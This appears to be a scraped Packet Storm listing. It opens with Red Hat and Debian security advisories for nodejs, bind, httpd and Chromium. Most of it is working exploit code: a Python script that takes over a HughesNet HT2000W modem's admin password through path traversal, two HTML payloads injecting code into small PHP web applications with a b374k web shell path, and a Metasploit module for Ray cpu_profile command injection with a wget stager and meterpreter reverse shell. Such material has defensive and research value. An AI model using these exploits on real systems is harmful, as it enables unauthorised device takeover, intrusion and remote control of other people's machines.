Red Hat Security Advisory 2024-5815-03 - An update for the nodejs:20 module is now available for Red Hat Enterprise Linux 9. Issues addressed include a bypass vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5815.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: nodejs:20 security updateAdvisory ID:        RHSA-2024:5815-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5815Issue date:         2024-08-26Revision:           03CVE Names:          CVE-2024-22018====================================================================Summary: An update for the nodejs:20 module is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Security Fix(es):* nodejs: Bypass network import restriction via data URL (CVE-2024-22020)* nodejs: fs.lstat bypasses permission model (CVE-2024-22018)* nodejs: fs.fchown/fchmod bypasses permission model (CVE-2024-36137)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-22018References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2296417https://bugzilla.redhat.com/show_bug.cgi?id=2296990https://bugzilla.redhat.com/show_bug.cgi?id=2299281

Red Hat Security Advisory 2024-5815-03

Red Hat Security Advisory 2024-5814-03 - An update for the nodejs:20 module is now available for Red Hat Enterprise Linux 8. Issues addressed include bypass and denial of service vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5814.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: nodejs:20 security update  
Advisory ID:        RHSA-2024:5814-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5814  
Issue date:         2024-08-26  
Revision:           03  
CVE Names:          CVE-2024-22018  
====================================================================

Summary: 

An update for the nodejs:20 module is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. 

Security Fix(es):

* node-tar: denial of service while parsing a tar file due to lack of folders depth validation (CVE-2024-28863)

* nodejs: Bypass network import restriction via data URL (CVE-2024-22020)

* nodejs: fs.lstat bypasses permission model (CVE-2024-22018)

* nodejs: fs.fchown/fchmod bypasses permission model (CVE-2024-36137)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-22018

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2293200  
https://bugzilla.redhat.com/show_bug.cgi?id=2296417  
https://bugzilla.redhat.com/show_bug.cgi?id=2296990  
https://bugzilla.redhat.com/show_bug.cgi?id=2299281

Red Hat Security Advisory 2024-5814-03

Red Hat Security Advisory 2024-5813-03 - An update for bind and bind-dyndb-ldap is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5813.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: bind and bind-dyndb-ldap security update  
Advisory ID:        RHSA-2024:5813-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5813  
Issue date:         2024-08-27  
Revision:           03  
CVE Names:          CVE-2024-1737  
====================================================================

Summary: 

An update for bind and bind-dyndb-ldap is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.

Security Fix(es):

* bind: bind9: BIND's database will be slow if a very large number of RRs exist at the same nam (CVE-2024-1737)

* bind9: bind: SIG(0) can be used to exhaust CPU resources (CVE-2024-1975)

* bind: bind9: Assertion failure when serving both stale cache data and authoritative zone content (CVE-2024-4076)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1737

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2298893  
https://bugzilla.redhat.com/show_bug.cgi?id=2298901  
https://bugzilla.redhat.com/show_bug.cgi?id=2298904

Red Hat Security Advisory 2024-5813-03

Red Hat Security Advisory 2024-5812-03 - An update for httpd is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5812.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: httpd security updateAdvisory ID:        RHSA-2024:5812-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5812Issue date:         2024-08-26Revision:           03CVE Names:          CVE-2024-38476====================================================================Summary: An update for httpd is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd: Security issues via?backend applications whose response headers are malicious or exploitable (CVE-2024-38476)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38476References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2295015

Red Hat Security Advisory 2024-5812-03

Debian Linux Security Advisory 5757-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5757-1                   security@debian.org  
https://www.debian.org/security/                           Andres Salomon  
August 23, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : chromium  
CVE ID         : CVE-2024-7964 CVE-2024-7965 CVE-2024-7966 CVE-2024-7967   
                 CVE-2024-7968 CVE-2024-7969 CVE-2024-7971 CVE-2024-7972   
                 CVE-2024-7973 CVE-2024-7974 CVE-2024-7975 CVE-2024-7976   
                 CVE-2024-7977 CVE-2024-7978 CVE-2024-7979 CVE-2024-7980   
                 CVE-2024-7981 CVE-2024-8033 CVE-2024-8034 CVE-2024-8035

Security issues were discovered in Chromium which could result  
in the execution of arbitrary code, denial of service, or information  
disclosure.

For the stable distribution (bookworm), these problems have been fixed in  
version 128.0.6613.84-1~deb12u1.

We recommend that you upgrade your chromium packages.

For the detailed security status of chromium please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/chromium

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmbIuBAACgkQZF0CR8Nu  
djc/0g//UhxIQpVHW7jkkJ9g81aIFC2xHygVHU3ZaMVQwm2lLnB1pbav4ziLLl34  
tGJpepJMZaUANSCqhWjA5X77R5utHbcgn8J47cUWXup0Dc8R9UXPis/wpcRQjYKB  
f2Znh/44SLW4KEHo7EkVSPlGvBEgN8k0Z4TFEPzDP5FH5xzCgm3f8XR2H0EDeNDW  
MHpB5oNdu8CrQ0/Xbq2ha2qZOaB/dQrzDJL5S2xopSSUOqN4QWJ22YNwhTR+0gSj  
7k/huogVHe3h7UgghaIIydQpuzLMqUkxDDOIpTbmRFVl3YjDm/rNU3chRuA6Hk3a  
I3fpjYJ5nFPm7N6s2LYauLX79+NA6WJsGgyVPB/MxzUu3Wa4trzMq3YGCF+hNMgk  
KGVOGv6el3w/50r7Ujfu2yBKfuZDxwT07Yeb98GAMsNTysClU0pagxVowX61w1+m  
kvfrHvgJW0p+4hpOJGvfVVWN0ZMr9A/psBzwdfhB7ccCShuzlYb3AfTCXqj0q5rp  
0jOaK5WLwXXXbFVG+cSJSYsb9iGRj9O4utzf0gwa0TD7A83gaubSv8iDzvkkAA1E  
RMwSyninkTXNFMZpV3U+mCpkt6dpw/8X93WizAEr2VENvTaB+VnIXcfi883WrRvy  
r9Ydd9kMqFRYHEHBmaIDYZfdQ3Y6ud6CJIrbsxejOqNlaEaM+CQ=  
=I/NM  
-----END PGP SIGNATURE-----

Debian Security Advisory 5757-1

HughesNet HT2000W Satellite Modem remote password reset exploit that leverages a path traversal vulnerability.

    # Exploit Title: HughesNet HT2000W Satellite Modem (Arcadyan httpd 1.0) - Password Reset# Date: 7/16/24# Exploit Author: Simon Greenblatt <simongreenblatt[at]protonmail.com># Vendor: HughesNet# Version: Arcadyan httpd 1.0# Tested on: Linux# CVE: CVE-2021-20090import sysimport requestsimport reimport base64import hashlibimport urllibred = "\033[0;41m"green = "\033[1;34;42m"reset = "\033[0m"def print_banner():    print(green + '''    _____________   _______________         _______________   ________  ____          _______________  _______  _______________        \_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \/_   |         \_____  \   _  \ \   _  \/   __   \   _  \       /    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/ |   |  ______  /  ____/  /_\  \/  /_\  \____    /  /_\  \      \     \____\     /   |        \ /_____/ /       \  \_/   \/       \ |   | /_____/ /       \  \_/   \  \_/   \ /    /\  \_/   \      \______  / \___/   /_______  /         \_______ \_____  /\_______ \|___|         \_______ \_____  /\_____  //____/  \_____  /             \/                  \/                  \/     \/         \/                      \/     \/       \/               \/  \n''' + reset)    print("                           Administrator password reset for HughesNet HT2000W Satellite Modem")    print('''    Usage: python3 hughes_ht2000w_pass_reset.py <password> <ip_address>    <password>:   The new administrator password    <ip_address>: The IP address of the web portal. If none is provided, the script will default to 192.168.42.1\n    This script takes advantage of CVE-2021-20090, a path traversal vulnerability in the HTTP daemon of the HT2000W modem to reset    the administrator password of the configuration portal. It also takes advantage of other vulnerabilities in the device such as    improper use of httokens for authentication and the portal allowing the MD5 hash of the password to be leaked.''')    return Nonedef get_httoken(ip_address):    # Make a GET request to system_p.htm using path traversal    r = requests.get(f'http://{ip_address}/images/..%2fsystem_p.htm')    if r.status_code != 200:        print(red + f"(-) Failure: Could not request system_p.htm" + reset)        exit()    # Extract the httoken hidden in the DOM and convert it from Base64    return base64.b64decode(re.search(r'AAAIBRAA7(.*?)"', r.text).group(1)).decode('ascii')def encode_pass(password):    # Vigenere Cipher    key = "wg7005d"    enc_pass = ""    idx = 0    for c in password:        enc_pass += str(ord(c) + ord(key[idx])) + "+"        idx = (idx + 1) % len(key)    return enc_passdef change_pass(ip_address, httoken, enc_pass):    # Create a POST request with the httoken and the encoded password    headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': f'http://{ip_address}/system_p.htm'}    payload = {'action': 'ui_system_p', 'httoken': httoken, 'submit_button': 'system_p.htm', 'ARC_SYS_Password': enc_pass}    payload = urllib.parse.urlencode(payload, safe=':+')    try:        r = requests.post(f'http://{ip_address}/images/..%2fapply_abstract.cgi', data = payload, headers = headers)    except:        pass    return Nonedef verify_pass(ip_address, new_pass):    # Make a GET request to cgi_sys_p.js to verify password    httoken = get_httoken(ip_address)    headers = {'Referer': f'http://{ip_address}/system_p.htm'}    r = requests.get(f'http://{ip_address}/images/..%2fcgi/cgi_sys_p.js?_tn={httoken}', headers = headers)    if r.text.split('"')[5] != hashlib.md5(bytes(new_pass, 'ascii')).hexdigest():        print(red + "(-) Failure: Could not verify the hash of the password" + reset)        exit()def main():    if not (len(sys.argv) == 2 or len(sys.argv) == 3):        print_banner()        return    new_pass = sys.argv[1]    ip_address = "192.168.42.1"    if sys.argv == 3:        ip_address = sys.argv[2]    httoken = get_httoken(ip_address)    print(f"[+] Obtained httoken: {httoken}")    enc_pass = encode_pass(new_pass)    change_pass(ip_address, httoken, enc_pass)    print(f"[+] Password reset to: {new_pass}")    verify_pass(ip_address, new_pass)    print("[+] Verified password hash: " + hashlib.md5(bytes(new_pass, 'ascii')).hexdigest())    print("[+] Password successfully changed!")    returnif __name__ == '__main__':    main()

HughesNet HT2000W Satellite Modem Password Reset

School Log Management System version 1.0 appears to suffers from a remote SQL injection vulnerability that allows an attacker to achieve code execution.

=============================================================================================================================================| # Title     : School Log Management System 1.0 WYSIWYG Settings Management Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Part 01 : about-us.php[+] This payload injects code of your choice into the database via Froala is a WYSIWYG editor V: 4.2.1 .    [+] Line 109 : Send the form data using fetch API (Set your target url)[+] save payload as poc.html[+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Settings Management</title>        <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet">        <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">    <style>        /* Custom Styles */        #cimg {            max-width: 100%;            height: auto;        }        #preloader2 {            position: fixed;            top: 0;            left: 0;            width: 100%;            height: 100%;            background: rgba(0, 0, 0, 0.5);            display: flex;            justify-content: center;            align-items: center;            z-index: 9999;        }        .form-group {            margin-bottom: 1rem;        }        .form-group label {            display: block;            margin-bottom: .5rem;        }        .form-group input, .form-group textarea {            width: 100%;            padding: .5rem;            box-sizing: border-box;        }    </style></head><body>    <div class="container">        <form id="manage-settings" method="post" enctype="multipart/form-data">            <div class="form-group">                <label for="name"> Name</label>                <input type="text" id="name" name="name" required>            </div>            <div class="form-group">                <label for="email">Email</label>                <input type="email" id="email" name="email" required>            </div>            <div class="form-group">                <label for="contact">Contact</label>                <input type="tel" id="contact" name="contact" required>            <div class="form-group">                <label for="about">About Content</label>                <textarea class="text-jqte" id="about" name="about"></textarea>            </div>            <div class="form-group">                <label for="img">Cover Image</label>                <input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)">                <img id="cimg" src="" alt="Selected Image Preview">            </div>            <button type="submit" class="btn btn-primary">Save Settings</button>        </form>    </div>      <div class="modal fade" id="viewer_modal" role='dialog'>        <div class="modal-dialog modal-md" role="document">            <div class="modal-content">                <button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button>                <img src="" alt="">            </div>        </div>    </div>        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>        <script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script>        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>    <script>        function displayImg(input, _this) {            if (input.files && input.files[0]) {                var reader = new FileReader();                reader.onload = function (e) {                    $('#cimg').attr('src', e.target.result);                }                reader.readAsDataURL(input.files[0]);            }        }        $(document).ready(function () {            const editorInstance = new FroalaEditor('.text-jqte');        });        $('#manage-settings').submit(function (e) {            e.preventDefault();            start_load();            $.ajax({                url: 'http://127.0.0.1/slms/admin/ajax.php?action=save_settings',                data: new FormData($(this)[0]),                cache: false,                contentType: false,                processData: false,                method: 'POST',                type: 'POST',                error: err => {                    console.log(err);                },                success: function (resp) {                    if (resp == 1) {                        alert_toast('Data successfully saved.', 'success');                        setTimeout(function () {                            location.reload();                        }, 1000);                    }                }            });        });        window.start_load = function () {            $('body').prepend('<div id="preloader2"></div>');        }        window.end_load = function () {            $('#preloader2').fadeOut('fast', function () {                $(this).remove();            });        }        window.viewer_modal = function ($src = '') {            start_load();            var t = $src.split('.');            t = t[1];            if (t == 'mp4') {                var view = $("<video src='" + $src + "' controls autoplay></video>");            } else {                var view = $("<img src='" + $src + "' />");            }            $('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove();            $('#viewer_modal .modal-content').append(view);            $('#viewer_modal').modal({                show: true,                backdrop: 'static',                keyboard: false,                focus: true            });            end_load();        }        window.uni_modal = function ($title = '', $url = '', $size = "") {            start_load();            $.ajax({                url: $url,                error: err => {                    console.log(err);                    alert("An error occurred");                },                success: function (resp) {                    if (resp) {                        $('#uni_modal .modal-title').html($title);                        $('#uni_modal .modal-body').html(resp);                        if ($size != '') {                            $('#uni_modal .modal-dialog').addClass($size);                        } else {                            $('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md");                        }                        $('#uni_modal').modal({                            show: true,                            backdrop: 'static',                            keyboard: false,                            focus: true                        });                        end_load();                    }                }            });        }        window._conf = function ($msg = '', $func = '', $params = []) {            $('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")");            $('#confirm_modal .modal-body').html($msg);            $('#confirm_modal').modal('show');        }        window.alert_toast = function ($msg = 'TEST', $bg = 'success') {            $('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning');            if ($bg == 'success')                $('#alert_toast').addClass('bg-success');            if ($bg == 'danger')                $('#alert_toast').addClass('bg-danger');            if ($bg == 'info')                $('#alert_toast').addClass('bg-info');            if ($bg == 'warning')                $('#alert_toast').addClass('bg-warning');            $('#alert_toast .toast-body').html($msg);            $('#alert_toast').toast({ delay: 3000 }).toast('show');        }    </script></body></html>[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

School Log Management System 1.0 SQL Injection / Code Execution

Simple College Website version 1.0 appears to suffers from a remote SQL injection vulnerability that allows an attacker to achieve code execution.

=============================================================================================================================================| # Title     : Simple College Website 1.0 WYSIWYG Settings Management Vulnerability                                                        || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html                        |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Part 01 : about-us.php[+] This payload injects code of your choice into the database via Froala is a WYSIWYG editor V: 4.2.1 .    [+] Line 109 : Send the form data using fetch API (Set your target url)[+] save payload as poc.html[+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Settings Management</title>        <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet">        <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">    <style>        /* Custom Styles */        #cimg {            max-width: 100%;            height: auto;        }        #preloader2 {            position: fixed;            top: 0;            left: 0;            width: 100%;            height: 100%;            background: rgba(0, 0, 0, 0.5);            display: flex;            justify-content: center;            align-items: center;            z-index: 9999;        }        .form-group {            margin-bottom: 1rem;        }        .form-group label {            display: block;            margin-bottom: .5rem;        }        .form-group input, .form-group textarea {            width: 100%;            padding: .5rem;            box-sizing: border-box;        }    </style></head><body>    <div class="container">        <form id="manage-settings" method="post" enctype="multipart/form-data">            <div class="form-group">                <label for="name"> Name</label>                <input type="text" id="name" name="name" required>            </div>            <div class="form-group">                <label for="email">Email</label>                <input type="email" id="email" name="email" required>            </div>            <div class="form-group">                <label for="contact">Contact</label>                <input type="tel" id="contact" name="contact" required>            <div class="form-group">                <label for="about">About Content</label>                <textarea class="text-jqte" id="about" name="about_us"></textarea>            </div>            <div class="form-group">                <label for="img">Cover Image</label>                <input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)">                <img id="cimg" src="" alt="Selected Image Preview">            </div>            <button type="submit" class="btn btn-primary">Save Settings</button>        </form>    </div>      <div class="modal fade" id="viewer_modal" role='dialog'>        <div class="modal-dialog modal-md" role="document">            <div class="modal-content">                <button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button>                <img src="" alt="">            </div>        </div>    </div>        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>        <script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script>        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>    <script>        function displayImg(input, _this) {            if (input.files && input.files[0]) {                var reader = new FileReader();                reader.onload = function (e) {                    $('#cimg').attr('src', e.target.result);                }                reader.readAsDataURL(input.files[0]);            }        }        $(document).ready(function () {            const editorInstance = new FroalaEditor('.text-jqte');        });        $('#manage-settings').submit(function (e) {            e.preventDefault();            start_load();            $.ajax({                url: 'http://127.0.0.1/college_website/admin/ajax.php?action=save_settings',                data: new FormData($(this)[0]),                cache: false,                contentType: false,                processData: false,                method: 'POST',                type: 'POST',                error: err => {                    console.log(err);                },                success: function (resp) {                    if (resp == 1) {                        alert_toast('Data successfully saved.', 'success');                        setTimeout(function () {                            location.reload();                        }, 1000);                    }                }            });        });        window.start_load = function () {            $('body').prepend('<div id="preloader2"></div>');        }        window.end_load = function () {            $('#preloader2').fadeOut('fast', function () {                $(this).remove();            });        }        window.viewer_modal = function ($src = '') {            start_load();            var t = $src.split('.');            t = t[1];            if (t == 'mp4') {                var view = $("<video src='" + $src + "' controls autoplay></video>");            } else {                var view = $("<img src='" + $src + "' />");            }            $('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove();            $('#viewer_modal .modal-content').append(view);            $('#viewer_modal').modal({                show: true,                backdrop: 'static',                keyboard: false,                focus: true            });            end_load();        }        window.uni_modal = function ($title = '', $url = '', $size = "") {            start_load();            $.ajax({                url: $url,                error: err => {                    console.log(err);                    alert("An error occurred");                },                success: function (resp) {                    if (resp) {                        $('#uni_modal .modal-title').html($title);                        $('#uni_modal .modal-body').html(resp);                        if ($size != '') {                            $('#uni_modal .modal-dialog').addClass($size);                        } else {                            $('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md");                        }                        $('#uni_modal').modal({                            show: true,                            backdrop: 'static',                            keyboard: false,                            focus: true                        });                        end_load();                    }                }            });        }        window._conf = function ($msg = '', $func = '', $params = []) {            $('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")");            $('#confirm_modal .modal-body').html($msg);            $('#confirm_modal').modal('show');        }        window.alert_toast = function ($msg = 'TEST', $bg = 'success') {            $('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning');            if ($bg == 'success')                $('#alert_toast').addClass('bg-success');            if ($bg == 'danger')                $('#alert_toast').addClass('bg-danger');            if ($bg == 'info')                $('#alert_toast').addClass('bg-info');            if ($bg == 'warning')                $('#alert_toast').addClass('bg-warning');            $('#alert_toast .toast-body').html($msg);            $('#alert_toast').toast({ delay: 3000 }).toast('show');        }    </script></body></html>[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Simple College Website 1.0 SQL Injection / Code Execution

This Metasploit module demonstrates a command injection vulnerability in Ray via cpu_profile.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Ray cpu_profile command injection',        'Description' => %q{          Ray RCE via cpu_profile command injection vulnerability.        },        'Author' => [          'sierrabearchell',                      # Vulnerability discovery          'byt3bl33d3r <marcello@protectai.com>', # Python Metasploit module          'Takahiro Yokoyama'                     # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2023-6019'],          ['URL', 'https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/'],        ],        'CmdStagerFlavor' => %i[wget],        'Payload' => {          'DisableNops' => true        },        'Platform' => %w[linux],        'Targets' => [          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],          [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ],          [            'Linux Command', {              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',                'FETCH_COMMAND' => 'WGET'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-11-15',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options(      [        Opt::RPORT(8265),      ]    )  end  def get_nodes    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'nodes?view=summary')    })    return unless res && res.code == 200    JSON.parse(res.body)  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'api/version')    })    return Exploit::CheckCode::Unknown unless res && res.code == 200    ray_version = res.get_json_document['ray_version']    return Exploit::CheckCode::Unknown unless ray_version    ray_version = Rex::Version.new(ray_version)    return Exploit::CheckCode::Safe unless Rex::Version.new('2.2.0') <= ray_version && ray_version <= Rex::Version.new('2.6.3')    @nodes = get_nodes    return Exploit::CheckCode::Vulnerable unless @nodes.nil?    Exploit::CheckCode::Appears  end  def exploit    # We need to pass valid node info to /worker/cpu_profile for the server to process the request    # First we list all nodes and grab the pid and ip of the first one (could be any)    @nodes ||= get_nodes    fail_with(Failure::Unknown, 'Failed to get nodes') unless @nodes    first_node = @nodes['data']['summary'].first    fail_with(Failure::Unknown, 'Failed to get pid') unless first_node.key?('agent') && first_node['agent'].key?('pid')    pid = first_node['agent']['pid']    fail_with(Failure::Unknown, 'Failed to get ip') unless first_node.key?('ip')    ip = first_node['ip']    print_good("Grabbed node info, pid: #{pid}, ip: #{ip}")    case target['Type']    when :nix_cmd      execute_command(payload.encoded, { pid: pid, ip: ip })    else      execute_cmdstager({ flavor: :wget, pid: pid, ip: ip })    end  end  def execute_command(cmd, opts = {})    send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'),      'vars_get' => {        'pid' => opts[:pid],        'ip' => opts[:ip],        'duration' => 5,        'native' => 0,        'format' => "`#{cmd}`"      }    })  endend

Ray cpu_profile Command Injection

This Metasploit modules demonstrates remote code execution in Ray via the agent job submission endpoint. This is intended functionality as Ray's main purpose is executing arbitrary workloads. By default Ray has no authentication.

